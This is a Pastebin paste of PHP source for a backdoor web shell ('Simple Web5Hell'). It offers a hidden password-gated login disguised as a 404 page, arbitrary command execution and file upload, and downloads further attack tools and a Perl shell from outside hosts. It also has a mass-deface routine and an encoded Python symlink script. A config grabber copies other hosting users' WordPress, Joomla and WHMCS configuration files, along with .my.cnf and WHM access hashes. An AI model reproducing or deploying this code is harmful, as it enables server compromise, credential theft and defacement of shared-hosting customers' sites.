AZZATSSINS_CYBERSERK

SIMPLE WEB5HELL BACKDOOR V3.05

Jun 19th, 2016
353
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 86.22 KB | None | 0 0
  1. <?php
  2. /*
  3. Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
  4. Login Page: file.php?god=damn
  5. Default Password: A/Z
  6. You Can ReCoded But Don't Change CopyRight
  7. example: ReCoded By XXXXX & © AZZATSSINS
  8. */
  9. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
  10. $color = "#00ff00";
  11. $default_action = 'FilesMan';
  12. @define('SELF_PATH', __FILE__);
  13. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  14.     header('HTTP/1.0 403');
  15.     exit;
  16. }
  17. @session_start();
  18. @error_reporting(0);
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @ini_set('display_errors', 0);
  23. @set_time_limit(0);
  24. @set_magic_quotes_runtime(0);
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27.     function stripslashes_array($array) {
  28.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29.     }
  30.     $_POST = stripslashes_array($_POST);
  31. }
  32. function echoLogin() {
  33. header('HTTP/1.0 404 Not Found');
  34. if($_GET['god']=="damn"){
  35. echo'<style>
  36.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  37.    </style>
  38.    <center>
  39.    <input type=password name=lol><br>
  40.    <input type=password name=lol><br>
  41.    <input type=password name=lol><br>
  42.    <input type=password name=lol><br>
  43.    <form method=post>
  44.    <input type=password name=pass>
  45.    </form><br>
  46.    <input type=password name=lol><br>
  47.    <input type=password name=lol><br>
  48.    <input type=password name=lol><br>
  49.    <input type=password name=lol><br>
  50.    </center>';
  51.     }
  52.     exit;
  53. }
  54. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  55.     if( empty( $auth_pass ) ||
  56.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  57.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  58.     else
  59.         echoLogin();
  60.  
  61. @error_reporting(0);
  62. @ini_set('output_buffering',0);
  63. @ini_set('display_errors', 0);
  64. @ini_set('log_errors',0);
  65. /*
  66. SIMPLE WEB5HELL V3.6
  67. Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
  68. Twitter : @AZZATSSINS
  69. Facebook: /AZZATSSINS.CYBERSERKERS
  70. VK: /azzatssins
  71. Dont Change ©Author/Editor® ^_^
  72. */
  73. echo "<title>SIMPLE WEB5HELL</title><style type='text/css'>body {
  74. background-image:url(https://scontent-amt2-1.xx.fbcdn.net/t31.0-8/fr/cp0/e15/q65/13161748_2018079475084811_4250834144748309831_o.jpg);background-position:center;background-color:#414141; }</style>
  75. <center><br><div style='background:#d400f4;margin:0px;padding:2px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:0px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?mysql=connect'>MYSQL</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?whmcs=killer'>WHMCS KILLER</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:0px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>]</div><br><div style='background:#3a3a3a;margin:0px;padding:0px;text-align:center;color:#202020;'><form method='POST'><input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins1' value='CONFIG'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins2' value='JUMPING'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins3' value='SYMLINK 01'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins4' value='SYMLINK 02'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssinsym' value='SYMLINK 03'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssinsyml' value='SYMLINK 04'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins5' value='BYPASS FUN'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins7' value='SERVER VULN'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins9' value='MASSDEFACE'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='cyberserkers2' value='WPMASS'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='cyberserkers3' value='PERLSHELL'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
  76. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  77. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  78.  
  79. $SCWD   = `pwd`;
  80.  
  81. if( $currentWD == "" ) {
  82.     $currentWD = $SCWD;
  83. }
  84.  
  85.  
  86. if( $_POST['_act'] == "List files!" ) {
  87.     $currentCMD = "ls -la";
  88. }
  89.  
  90. echo "<div style='background:orange;margin:0px;padding:0px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
  91.  
  92. echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  93. echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  94.  
  95. echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  96. echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  97.  
  98. echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
  99. echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  100.  
  101. echo "</table></form>";
  102. echo"</div></div></center>";
  103. if($_GET['whmcs']=="killer"){
  104. $get = file_get_contents('http://wget.yu.tl/files/whmcs-killer.css');
  105. $bwt = fopen('wk.php', 'w');
  106. fwrite($bwt,$get);
  107. fclose($bwt);
  108. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">'; }
  109. if($_POST['cyberserkers2']){
  110. $get = file_get_contents('http://wget.yu.tl/files/wp-mas.css');
  111. $bwt = fopen('wpm.php', 'w');
  112. fwrite($bwt,$get);
  113. fclose($bwt);
  114. echo'<meta http-equiv="Refresh" content= "0; url=wpm.php">';
  115.  }
  116.  if($_POST['cyberserkers3']){
  117. $get = file_get_contents('http://pastebin.com/raw/5trLjPyh');
  118. $bwt = fopen('cgi.pl', 'w');
  119. fwrite($bwt,$get);
  120. fclose($bwt);
  121. chmod('cgi.pl',0755);
  122. echo'<meta http-equiv="Refresh" content= "0; url=cgi.pl">';
  123.  }
  124. if($_POST['azzatssins9']){
  125.  ?>
  126. <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
  127. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
  128. <br>
  129. Nama File : <input typ=text name=file size=20 value="index.htm">
  130. <br>URL Script :
  131. <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
  132. <br>
  133. <input type=submit value=Deface>
  134. </form></i></b></center>
  135. <?php
  136.  $path=$_POST[path];
  137.  $file=$_POST[file];
  138.  $script=$_POST[url];
  139.  $dir=opendir("$path");
  140.  while($row=readdir($dir))
  141.  {
  142.  $start=@fopen("$row/$file","w+");
  143.  $code=@file_get_contents($script);
  144.  $finish=@fwrite($start,$code);
  145.  if ($finish)
  146.  {
  147.  echo "$row/$file > Done<br><br>";
  148.  }
  149. } /*MassDeface by AZZATSSINS*/
  150. }
  151. if($_POST['azzatssinsyml']){
  152. $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
  153. $pys = fopen("symlink.py","w+");
  154. fwrite($pys,$py);
  155. system('python symlink.py');
  156. system('rm symlink.py');
  157. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
  158. }
  159. if($_POST['azzatssinsym']){
  160. @session_start();
  161. @set_time_limit(0);
  162. @ini_set('max_execution_time',0);
  163. @mkdir('xazsx',0777);
  164. $sempak  = "Options +FollowSymLinks
  165. \nDirectoryIndex azzatssins.shtml
  166. \nRemoveHandler .php
  167. \nAddType application/octet-stream .php";
  168. $masuk =@fopen ('xazsx/.htaccess','w');
  169. fwrite($masuk ,$sempak);
  170. @symlink('/','xazsx/azzatssins.txt');  
  171. $pg = basename(__FILE__);
  172.  
  173.  
  174. if(is_readable("/var/named")){
  175. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  176. <td align="center"> <font color="white"> <b>DOMAINS</b></td>
  177. <td align="center"> <font color="white"> <b>USERS</b></td>
  178. <td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
  179. $list = scandir("/var/named");
  180. foreach($list as $domain){
  181. if(strpos($domain,".db")){
  182. @error_reporting(0);
  183. @ini_set('log_errors',0);
  184. @ini_set('error_log',NULL);
  185.  
  186. $i += 1;
  187. $domain = str_replace('.db','',$domain);
  188. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  189. echo "<tr>
  190. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  191. <td align='center'><font color='white'>".$owner['name']."</td>
  192. <td align='center'><a href='xazsx/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  193. }
  194. }
  195. flush();
  196. flush();
  197. }
  198. echo "</tr></table></div></html>";
  199.  
  200. }
  201. if($_POST['azzatssins1']){
  202. /*Simple Config Grabber With Copy File Method By AZZATSSINS CYBERSERKERS*/
  203. //$us = file_get_contents("/etc/passwd");
  204. $usa = fopen('/etc/passwd','r');
  205. $dir = mkdir('AZZATSSINS', 0777);
  206. $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
  207. $frr = fopen('AZZATSSINS/.htaccess', 'w');
  208. fwrite($frr, $rrrr);
  209. while($us = fgets($usa)){
  210.  if($us==""){
  211.  echo "<font color=red>can't read /etc/passwd</font>";
  212.  }
  213. else{
  214.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  215.  foreach($user_byk[1] as $user){
  216.  $dir1 = "/home/$user/public_html/";
  217. if(is_readable($dir1)){
  218.  
  219. system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS.txt');
  220. system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS.txt');
  221. system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC.txt');
  222. system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP.txt');
  223. system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM.txt');
  224. }
  225. else{
  226.     }
  227. }
  228. }
  229.  
  230. } system('rm AZZATSSINS/.htaccess');
  231.  
  232. echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
  233. if($_GET['mysql']=="connect"){
  234. $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
  235. $bwt = fopen('mysql.php', 'w');
  236. fwrite($bwt,$get);
  237. fclose($bwt);
  238. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  239. }
  240. if($_GET['WHMCS']=="REMOTE"){
  241. $get = file_get_contents('http://wget.yu.tl/files/ah.css');
  242. $bwt = fopen('rw.php', 'w');
  243. fwrite($bwt,$get);
  244. fclose($bwt);
  245. echo'<meta http-equiv="Refresh" content= "0; url=rw.php">';
  246. }
  247.  
  248. if($_GET['AZZATSSINS']=="CONFIGRABBER"){
  249.  ?>
  250. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:[email protected]>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  251. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  252. <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  253. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  254. if ($_POST['conf']) {
  255. $folfig = $_POST['folfig'];
  256. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  257. @mkdir($folfig, 0755);
  258. @chdir($folfig);
  259. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  260. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  261. $passwd=explode("\n",$_POST["passwd"]);
  262. foreach($passwd as $pwd){ $user=trim($pwd);
  263. symlink('/','000~ROOT~000');
  264. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  265. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  266. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  267. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  268. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  269. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  270. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  271. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  272. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  273. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  274. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  275. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  276. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  277. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  278. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  279. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  280. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  281. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  282. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  283. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  284. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  285. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  286. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  287. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  288. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  289. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  290. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  291. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  292. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  293. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  294. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  295. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  296. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  297. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  298. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  299. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  300. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  301. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  302. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  303. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  304. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  305. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  306. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  307. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  308. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  309. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  310. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  311. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  312. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  313. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  314. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  315. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  316. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  317. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  318. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  319.  
  320. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  321. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  322. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  323. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  324. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  325. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  326. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  327. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  328. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  329. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  330. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  331. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  332. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  333. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  334. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  335. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  336. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  337. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  338. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  339. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  340. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  341. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  342. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  343. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  344. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  345. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  346. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  347. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  348. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  349. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  350. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  351. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  352. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  353. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  354. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  355. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  356. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  357. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  358. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  359. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  360. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  361. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  362. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  363. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  364. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  365. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  366. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  367. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  368. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  369. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  370. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  371. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  372. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  373. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  374. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  375. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  376. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  377. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  378. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  379. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  380. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  381. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  382.  
  383. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  384. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  385. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  386. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
